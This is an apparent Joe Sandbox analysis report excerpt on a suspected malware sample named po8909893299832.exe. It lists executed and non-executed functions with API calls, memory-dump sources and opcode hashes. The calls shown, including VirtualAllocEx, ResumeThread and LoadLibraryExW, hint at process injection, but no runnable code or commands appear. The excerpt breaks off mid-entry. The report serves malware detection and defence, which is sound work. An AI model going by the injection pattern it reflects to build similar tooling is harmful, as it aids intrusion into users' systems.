Source File: 00000000.00000002.1446922378.0000000000970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00970000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_970000_po8909893299832.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 6f85d7dbaea098efa18dd4bbb3579887c8884f3c4eed0bbc1a128262e0dd5bc5
Instruction ID: 5b3721adb3bd0f617c10564a71ed2e7e1d5a22b4bf4fb60176d831c9bb9f3026
Opcode Fuzzy Hash: 6f85d7dbaea098efa18dd4bbb3579887c8884f3c4eed0bbc1a128262e0dd5bc5
Instruction Fuzzy Hash: F321E4B59003099FDB10CFAAD884ADEBBF8FB48310F14801AE918A3350D374A940CF64

Function 06BB7320 Relevance: 1.6, APIs: 1, Instructions: 56memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 06BB7396

Memory Dump Source

Source File: 00000000.00000002.1452770258.0000000006BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6bb0000_po8909893299832.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 2ad365bd0a0d2616dbc650a2b16e7cafdee806b5717b77c270609d4099581299
Instruction ID: 27ae6a25b772b1a6190f92a32a6dfa0166ca4fa9fb2f869352acb76397366c44
Opcode Fuzzy Hash: 2ad365bd0a0d2616dbc650a2b16e7cafdee806b5717b77c270609d4099581299
Instruction Fuzzy Hash: 2B1159759003099FDB20DFAAC845BEEBBF5EF88320F148419E519A7250CB759944DFA0

Function 0097A108 Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,0097B019,00000800,00000000,00000000), ref: 0097B22A

Memory Dump Source

Source File: 00000000.00000002.1446922378.0000000000970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00970000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_970000_po8909893299832.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 8356f4ee3ddac8f824732e873fa4790e0281e41ba191a8ac5c43c48d7c2f2ef9
Instruction ID: 57ab09376a40a1ff013a60cd8a941ac756f7cff920373439b415fe375ff1e94e
Opcode Fuzzy Hash: 8356f4ee3ddac8f824732e873fa4790e0281e41ba191a8ac5c43c48d7c2f2ef9
Instruction Fuzzy Hash: 7E1126B69003098FDB10DF9AD444BDEFBF8EB88310F10842EE529A7200C375A945CFA4

Function 0097B1B9 Relevance: 1.6, APIs: 1, Instructions: 54libraryCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,0097B019,00000800,00000000,00000000), ref: 0097B22A

Memory Dump Source

Source File: 00000000.00000002.1446922378.0000000000970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00970000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_970000_po8909893299832.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 7588b95539bee97a62b42deb941e9fec6ea77418bbccdf89152581fc6a418cae
Instruction ID: 7444b96048ac807fe92951697b4c1b01f970139363ff5161f8e2892da2df88ab
Opcode Fuzzy Hash: 7588b95539bee97a62b42deb941e9fec6ea77418bbccdf89152581fc6a418cae
Instruction Fuzzy Hash: D01112B69003498FDB14CFAAD844BDEFBF4EB88310F10842AD869A7611C375A945CFA4

Function 06BB7328 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 06BB7396

Memory Dump Source

Source File: 00000000.00000002.1452770258.0000000006BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6bb0000_po8909893299832.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 78fd81b1eb863ce5e59691de3d8d28d58497adbe70d7bccd6061c6f8a9ecab07
Instruction ID: c280ad3e08b3f91f708d174f332be2836c563c391e62cc79ca52a6c0885aa8d6
Opcode Fuzzy Hash: 78fd81b1eb863ce5e59691de3d8d28d58497adbe70d7bccd6061c6f8a9ecab07
Instruction Fuzzy Hash: 7B1137718003499FDB20DFAAC845BEEBBF5EF88720F148819E519A7250CB759941DFA0

Function 06BB6D61 Relevance: 1.6, APIs: 1, Instructions: 52threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNELBASE ref: 06BB6DCA

Memory Dump Source

Source File: 00000000.00000002.1452770258.0000000006BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6bb0000_po8909893299832.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: 2d0b99d449790a8e261890a022d3a188847a168738e9a6924f9adfc82083e7d7
Instruction ID: b4337d996990ec34ac9e5e957e7aca5d0fdaabad0460905884a90550615a700f
Opcode Fuzzy Hash: 2d0b99d449790a8e261890a022d3a188847a168738e9a6924f9adfc82083e7d7
Instruction Fuzzy Hash: DA116DB1D003098FDB20DFAAC4457EEFBF5EF88610F208419D519A7240CB75A944CFA4

Function 06BB6D68 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNELBASE ref: 06BB6DCA

Memory Dump Source

Source File: 00000000.00000002.1452770258.0000000006BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6bb0000_po8909893299832.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: 76f400b6f061f014e1b6da5fab73e125c20e90b521b2ae5c751e0611339f7077
Instruction ID: f74d5df8bcc62f943e16ab5323b967e7a5430caed58505d9a69cc63b5415b772
Opcode Fuzzy Hash: 76f400b6f061f014e1b6da5fab73e125c20e90b521b2ae5c751e0611339f7077
Instruction Fuzzy Hash: 26114CB1D003498FDB10DFAAC4457EEFBF5EF88620F248819D519A7240DB75A944CF94

Function 06BB8DAC Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,00000010,00000000,?), ref: 06BBBE05

Memory Dump Source

Source File: 00000000.00000002.1452770258.0000000006BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6bb0000_po8909893299832.jbxd

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: c0f68b476c14a67a8d9a170e1fc1604ed96387cb0bf8fba5f7696eb36382c6ca
Instruction ID: cd302af8624be0510e53de4095d3ec3f242424127395ab000fb9f57f382776d1
Opcode Fuzzy Hash: c0f68b476c14a67a8d9a170e1fc1604ed96387cb0bf8fba5f7696eb36382c6ca
Instruction Fuzzy Hash: 8D1106B5800349DFDB50DF9AC885BEEBBF8FB48714F108459E519A7210C3B5A944CFA1

Function 06BBBDA0 Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,00000010,00000000,?), ref: 06BBBE05

Memory Dump Source

Source File: 00000000.00000002.1452770258.0000000006BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6bb0000_po8909893299832.jbxd

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: 6a968495668d434869ce8c28f1c92dcfb014978fc8f53ee27a86f438db82934a
Instruction ID: 607fbebdcf17b00e999c96e0613ddd3119807747f60e632333206d95ffd53c57
Opcode Fuzzy Hash: 6a968495668d434869ce8c28f1c92dcfb014978fc8f53ee27a86f438db82934a
Instruction Fuzzy Hash: 8E1103B5800349DFDB20DF9AD885BEEBBF8FB48320F208459E519A7250C775A944CFA1

Function 0097AF38 Relevance: 1.5, APIs: 1, Instructions: 47COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 0097AF9E

Memory Dump Source

Source File: 00000000.00000002.1446922378.0000000000970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00970000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_970000_po8909893299832.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 5979c5ee7e45b8ffe130b8e801e242507463c13a5177b3b5c841b1a654081595
Instruction ID: 299d691b06f5548ec6c358c258a929ea0a8b1c66ea68f4f53124010420e9ec06
Opcode Fuzzy Hash: 5979c5ee7e45b8ffe130b8e801e242507463c13a5177b3b5c841b1a654081595
Instruction Fuzzy Hash: 6D11E0B6C007498FDB20DF9AD544BDEFBF8AB88324F10841AD819A7610D379A545CFA5

Function 008AD01C Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1446195548.00000000008AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 008AD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8ad000_po8909893299832.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5ac866333653a23f938b82e56f5dd87b4ee176f3c67d3579c6ed5e3b4f162bd2
Instruction ID: 79728d3cf2ef704e5667d1782a201d85d49d81c0f2111a946cd615a85d049080
Opcode Fuzzy Hash: 5ac866333653a23f938b82e56f5dd87b4ee176f3c67d3579c6ed5e3b4f162bd2
Instruction Fuzzy Hash: 8B212275604704DFEB14DF20D984B16BB61FB89314F20C56DD84ACBB86C37AD807CA62

Function 008AD1D4 Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1446195548.00000000008AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 008AD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8ad000_po8909893299832.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9284e8ea0ef94ea298a308fba5c667579e77db0afc4957970faeb7c542be3953
Instruction ID: 1b1dff0fb217d3df507f414325bbef448ebde39e83129b44c48ecd19e57fc74e
Opcode Fuzzy Hash: 9284e8ea0ef94ea298a308fba5c667579e77db0afc4957970faeb7c542be3953
Instruction Fuzzy Hash: 1D21F575604304DFEB05DF10D9C4B25BB65FB85714F20C56DD84ACBA92C33AE846CA61

Function 008AD006 Relevance: .1, Instructions: 63COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1446195548.00000000008AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 008AD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8ad000_po8909893299832.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 96f133c612897be797aace5914b65b26cb3e479742119c9e7f1a6eade8de2104
Instruction ID: 268556914563fabee3c89a8a1425e3afbaf2543b6a73017db57fab5439901ddc
Opcode Fuzzy Hash: 96f133c612897be797aace5914b65b26cb3e479742119c9e7f1a6eade8de2104
Instruction Fuzzy Hash: 732180755087809FDB02CF24D994711BF71FB46314F28C5EAD8898F6A7C33A9816CB62

Function 008AD1CF Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1446195548.00000000008AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 008AD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8ad000_po8909893299832.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8009cd9747851c6a16484d38da83a80e1112e09f0888f91abd329c0e09305381
Instruction ID: cb5a0b5e90946441b2d15649028f66cab9bc279458d5da6d12c4ea069b0d9d79
Opcode Fuzzy Hash: 8009cd9747851c6a16484d38da83a80e1112e09f0888f91abd329c0e09305381
Instruction Fuzzy Hash: B211BB75504280DFDB01CF10C5C4B15BBA2FB85324F24C6ADD84A8BAA6C33AE80ACB61

Non-executed Functions

Function 06BBD758 Relevance: .4, Instructions: 353COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1452770258.0000000006BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6bb0000_po8909893299832.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c689d0756a44f4b469bfe454e2f1f9d131718f79ba37e27cd03214f7dc513c2f
Instruction ID: 8941ee277584aa03d50aa37d3081160d98897310c640aa55a97a552d9f04732c
Opcode Fuzzy Hash: c689d0756a44f4b469bfe454e2f1f9d131718f79ba37e27cd03214f7dc513c2f
Instruction Fuzzy Hash: BAD1ACB1B006048FDBA9EB75C8607BE77F6AFC9700F1494A9D14ADB291DBB8D801CB51

Function 06BB6E18 Relevance: .3, Instructions: 312COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1452770258.0000000006BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6bb0000_po8909893299832.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b66e48b2146598d88a0404104e515bd7e7fcbbd68b9d240d758703b50477c69f
Instruction ID: 07044946c85b2ca5a455e510bb7b49ffc13f8cc628556d9f7afe8d87550a7a80
Opcode Fuzzy Hash: b66e48b2146598d88a0404104e515bd7e7fcbbd68b9d240d758703b50477c69f
Instruction Fuzzy Hash: F3E11AB4E002198FDB14DFA8D580AAEFBF2FF89314F249169E414AB356D7709941CFA0

Function 06BB44C8 Relevance: .3, Instructions: 312COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1452770258.0000000006BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6bb0000_po8909893299832.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 617c2358da1eceeb0916d22dbdd363600c5389368aa1dfec71ed63df05631a74
Instruction ID: 1a2389fc6ae050de7ca1c6eaea464d3026432c3698549c41ea62821b0454235e
Opcode Fuzzy Hash: 617c2358da1eceeb0916d22dbdd363600c5389368aa1dfec71ed63df05631a74
Instruction Fuzzy Hash: 39E13DB4E002198FDB14DFA9D5809AEFBF2FF89315F2481A9D415AB35AC7709941CFA0

Function 06BB4D38 Relevance: .3, Instructions: 312COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1452770258.0000000006BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6bb0000_po8909893299832.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 31988e4414c673d2ecd004bc725717eac906e361f3a418b9326682daeb1be540
Instruction ID: 802923127fe6e59d74f18aea3e6da2f34ed9f079274e12bcdd5a1388ab37e655
Opcode Fuzzy Hash: 31988e4414c673d2ecd004bc725717eac906e361f3a418b9326682daeb1be540
Instruction Fuzzy Hash: B6E12EB4E102198FDB14DFA8D580AAEFBF2FF89314F248159D418AB356D770A941CFA1

Function 06BB6540 Relevance: .3, Instructions: 312COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1452770258.0000000006BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6bb0000_po8909893299832.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4f66db0458c7044bfebef562e08b496a7ea25ec9a6460f9c974c02653e7a14e2
Instruction ID: fd09984d170640292682f7f7257718cb07ec601d62259510b91317e9c5f598b2
Opcode Fuzzy Hash: 4f66db0458c7044bfebef562e08b496a7ea25ec9a6460f9c974c02653e7a14e2
Instruction Fuzzy Hash: 07E109B4E002198FDB14DFA9D580AAEBBF2FF89314F248169D419AB356D770AD41CF60

Function 06BB4900 Relevance: .3, Instructions: 312COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1452770258.0000000006BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6bb0000_po8909893299832.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0ddaf0936a5c0dbf531fd35e27ed6b1352e6cd848db480dc0a75f496c1545334
Instruction ID: 5145fb651013f6465d97d2c5797e5945c3623b5022aee2ce89ae2ec0cdc8e538
Opcode Fuzzy Hash: 0ddaf0936a5c0dbf531fd35e27ed6b1352e6cd848db480dc0a75f496c1545334
Instruction Fuzzy Hash: 48E11BB4E002198FDB14DFA9D580AAEBBF2FF89314F248169D515AB35AD7309D41CF60

Function 0097D304 Relevance: .3, Instructions: 264COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1446922378.0000000000970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00970000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_970000_po8909893299832.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f6f0488de255033588b43bde216111125c4e8db0b29a17cd16d6ee298d5ba32a
Instruction ID: 3a52bddb122fb02630e8eca9490b4ff1d4b0e297f39ca0d4a1f1d702698f1202
Opcode Fuzzy Hash: f6f0488de255033588b43bde216111125c4e8db0b29a17cd16d6ee298d5ba32a
Instruction Fuzzy Hash: 5DA16F36E006158FCF09DFB4C8505AEB7B6FF85300B1585BAE809BB256DB71E916CB40

Function 06BB6530 Relevance: .1, Instructions: 132COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1452770258.0000000006BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6bb0000_po8909893299832.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e063b3dce60d0ef564931ec307e310b8ca7f4e92d8779efbf203c0ffe2d0952f
Instruction ID: f59098a59f4bf0d3c3c07bc9ade8aa60cc583515cb796c9f652ad6634cd1828e
Opcode Fuzzy Hash: e063b3dce60d0ef564931ec307e310b8ca7f4e92d8779efbf203c0ffe2d0952f
Instruction Fuzzy Hash: 495105B0E002198FDB14DFA9D5805EEBBF2FB89314F2481A9D419AB356D7319D42CFA1

Analysis Process: po8909893299832.exePID: 8056, Parent PID: 7572COMMON

Execution Graph

Execution Coverage:	0%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	40%
Total number of Nodes:	5
Total number of Limit Nodes:	1

Executed Functions

Function 01A52BF0 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 01A52BFA

Memory Dump Source

Source File: 00000009.00000002.1497285898.00000000019E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019E0000, based on PE: true

Associated: 00000009.00000002.1497285898.0000000001B09000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.1497285898.0000000001B0D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.1497285898.0000000001B7E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_19e0000_po8909893299832.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 90bcf4ccfd6276be7e98c67d634a572b50c4c8265eb0c1c7fc1c74619ea4e7af
Instruction ID: 0b1cd95f4e7e9510bf51d0bdfe99416aebb7b2b4fca488c8f5d8c101049c63bf
Opcode Fuzzy Hash: 90bcf4ccfd6276be7e98c67d634a572b50c4c8265eb0c1c7fc1c74619ea4e7af
Instruction Fuzzy Hash: 1390027120150802D1807158440464E000D97E1301F96C015A4025654DCA198B5977A1

Function 01A52B60 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 01A52B6A

Memory Dump Source

Source File: 00000009.00000002.1497285898.00000000019E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019E0000, based on PE: true

Associated: 00000009.00000002.1497285898.0000000001B09000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.1497285898.0000000001B0D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.1497285898.0000000001B7E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_19e0000_po8909893299832.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 963c3f9bcc5d07a542c4337f73f94a8cf56b407463903b86c45559305d1a7e02
Instruction ID: f99dbf45330a9d6541f5a0d786528dbc763c334c7312451f74022077f878e627
Opcode Fuzzy Hash: 963c3f9bcc5d07a542c4337f73f94a8cf56b407463903b86c45559305d1a7e02
Instruction Fuzzy Hash: 7F9002A12025000341057158441461A400E97F0201F56C021E5014590DC52989916225

Function 01A52AD0 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 01A52ADA

Memory Dump Source

Source File: 00000009.00000002.1497285898.00000000019E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019E0000, based on PE: true

Associated: 00000009.00000002.1497285898.0000000001B09000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.1497285898.0000000001B0D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.1497285898.0000000001B7E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_19e0000_po8909893299832.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 5706c519b87709fe34121b842f13b89a2b749eb51a34a330e048536fdccebcc8
Instruction ID: e6b66ef0d5060c5ded1c27aace5deeae992fa6c3f18cd7442f8133a97521cf6a
Opcode Fuzzy Hash: 5706c519b87709fe34121b842f13b89a2b749eb51a34a330e048536fdccebcc8
Instruction Fuzzy Hash: C3900475311500030105F55C070450F004FD7F5351757C031F5015550CD735CD715331

Function 01A52DF0 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 01A52DFA

Memory Dump Source

Source File: 00000009.00000002.1497285898.00000000019E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019E0000, based on PE: true

Associated: 00000009.00000002.1497285898.0000000001B09000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.1497285898.0000000001B0D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.1497285898.0000000001B7E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_19e0000_po8909893299832.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 9d2b6944517bb0fc15490213fe4284bddcd62861a4f005b9b4c5aaabf965169a
Instruction ID: 069dfe20283047bd95c30dfda9ef109241a7c5bbf036ecf7162b3d65c738108a
Opcode Fuzzy Hash: 9d2b6944517bb0fc15490213fe4284bddcd62861a4f005b9b4c5aaabf965169a
Instruction Fuzzy Hash: 5390027120150413D1117158450470B000D97E0241F96C412A4424558DD65A8A52A221

Function 01A52DD0 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 01A52DDA

Memory Dump Source

Source File: 00000009.00000002.1497285898.00000000019E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019E0000, based on PE: true

Associated: 00000009.00000002.1497285898.0000000001B09000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.1497285898.0000000001B0D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.1497285898.0000000001B7E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_19e0000_po8909893299832.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 180d59c64ac21d87cbc990747848b9dd887324ed760f006f56b3d7cef8ff5f71
Instruction ID: 9b6f3d263712557da78efc4fb083c08472bfb58ef3331d59001aaf121784927e
Opcode Fuzzy Hash: 180d59c64ac21d87cbc990747848b9dd887324ed760f006f56b3d7cef8ff5f71
Instruction Fuzzy Hash: 05900261242541525545B158440450B400EA7F0241B96C012A5414950CC52A9956D721

Function 01A52D30 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 01A52D3A

Memory Dump Source

Source File: 00000009.00000002.1497285898.00000000019E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019E0000, based on PE: true

Associated: 00000009.00000002.1497285898.0000000001B09000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.1497285898.0000000001B0D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.1497285898.0000000001B7E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_19e0000_po8909893299832.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 5dbcccf4cdf1e860a3bbcb3b774c162a6c2d5d414b55f85d5f4909fac8b26b9a
Instruction ID: 83fa27237d35effaea44e52f41b0ede0743e9b6e4ac37aec92d52498fcc98637
Opcode Fuzzy Hash: 5dbcccf4cdf1e860a3bbcb3b774c162a6c2d5d414b55f85d5f4909fac8b26b9a
Instruction Fuzzy Hash: 3890026130150003D1407158541860A400DE7F1301F56D011E4414554CD91989565322

Function 01A52D10 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 01A52D1A

Memory Dump Source

Source File: 00000009.00000002.1497285898.00000000019E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019E0000, based on PE: true

Associated: 00000009.00000002.1497285898.0000000001B09000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.1497285898.0000000001B0D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.1497285898.0000000001B7E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_19e0000_po8909893299832.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 3c5b8aaaa76df61df9dad94add4c5938fa634942c9bfe8516bf9e781b3044226
Instruction ID: b4db37eefb76c841b182ca8e0d490021b14812a35b933dd39bc1c054817de7e0
Opcode Fuzzy Hash: 3c5b8aaaa76df61df9dad94add4c5938fa634942c9bfe8516bf9e781b3044226
Instruction Fuzzy Hash: 2790026921350002D1807158540860E000D97E1202F96D415A4015558CC91989695321

Function 01A52CA0 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 01A52CAA

Memory Dump Source

Source File: 00000009.00000002.1497285898.00000000019E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019E0000, based on PE: true

Associated: 00000009.00000002.1497285898.0000000001B09000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.1497285898.0000000001B0D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.1497285898.0000000001B7E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_19e0000_po8909893299832.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 0fe05a53dcfee4bae93c5a1d837f2488cefaec3ff166a43c6c374ee23686f388
Instruction ID: 8fef38c3bd3b3b73b6c82bef0f2536dfa5c671d7c4acf62157fd6f04ca93f57a
Opcode Fuzzy Hash: 0fe05a53dcfee4bae93c5a1d837f2488cefaec3ff166a43c6c374ee23686f388
Instruction Fuzzy Hash: 4490027120150402D1007598540864A000D97F0301F56D011A9024555EC66989916231

Function 01A52C70 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 01A52C7A

Memory Dump Source

Source File: 00000009.00000002.1497285898.00000000019E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019E0000, based on PE: true

Associated: 00000009.00000002.1497285898.0000000001B09000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.1497285898.0000000001B0D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.1497285898.0000000001B7E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

